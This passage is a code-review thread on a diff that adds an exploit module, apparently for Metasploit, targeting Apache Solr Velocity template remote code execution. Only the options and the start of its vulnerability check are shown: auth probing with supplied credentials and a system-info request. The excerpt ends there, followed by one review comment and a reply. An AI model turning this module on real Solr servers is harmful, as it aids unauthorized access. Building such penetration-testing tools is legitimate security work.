modules/exploits/multi/http/solr_velocity_rce.rb

```diff
@@ -0,0 +1,354 @@
+                }
+              ]
+            ],
+        'DisclosureDate' => "Oct 29 2019",
+        'Privileged'     => false
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8983),
+        OptString.new('USERNAME', [false, 'Solr username (default is solr)', '']),
+        OptString.new('PASSWORD', [false, 'Solr password (default is SolrRocks)', ''])
+      ]
+    )
+  end
+
+  # are we just checking? or are we exploiting?
+  @vuln_check = true
+  # if we are just checking, we only need one core to be exploitable
+  @core_name = ""
+  # OS specific stuff
+  @target_platform = ""
+  @target_arch = ""
+  # has the switch been flicked?
+  @params_resource_loader_enabled = false
+  # if authentication is used
+  @auth_string = ""
+
+  # check for vulnerability existence
+  def check
+    # see if authentication is required for the specified Solr instance
+    auth_check = send_request_cgi({
+                 'method'  => 'GET',
+                 'headers' => { 'Connection' => 'Keep-Alive' },
+                 'uri'     => '/solr/'
+      })
+    # if return code is not 200, then the Solr instance definitely requires authentication
+    unless auth_check.code == 200
+      print_warning("Authentication required for #{peer}!")
+      vprint_warning("Server auth banner: #{auth_check['WWW-Authenticate']}")
+      # no creds provided means we cannot reliably check exploitability
+      if datastore['USERNAME'] == nil and datastore['PASSWORD'] == nil
+        print_error("Credentials not provided, skipping credentialed check...")
+        return CheckCode::Unknown
+      # otherwise, attempt authentication
+      else
+        print_status("Attempting authentication for #{peer}...")
+        attempt_auth = send_request_cgi({
+                       'method'  => 'GET',
+                       'headers' => {
+                                      'Connection'    => 'Keep-Alive',
+                                      'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+                                    },
+                       'uri'     => '/solr/'
+          })
+
+        unless attempt_auth.code == 200
+          print_status("Authentication failed!")
+          return CheckCode::Unknown
+        end
+
+        @auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+        # TODO: add creds to MSF database
+      end
+    end
+
+    # if successful authentication happens, user the authorization header for the rest of the check
+    if @auth_string == ""
+      @headers = {
+        'Connection'   => 'Keep-Alive',
+      }
+    else
+      @headers = {
+        'Connection'      => 'Keep-Alive',
+        'Authorization'   => @auth_string.to_s
+      }
+    end
+
+    # send a GET request to get Solr and system details
+    ver = send_request_cgi({
+          'method'  => 'GET',
+          'headers' => @headers,
+          'uri'     => '/solr/admin/info/system?wt=json'
```

Comment:
Please use `vars_get` for HTTP GET parameters.

Reply:
Unnecessary, got removed in commit 046d8cbedc659abf7ec2edeb922b3df71c046a22.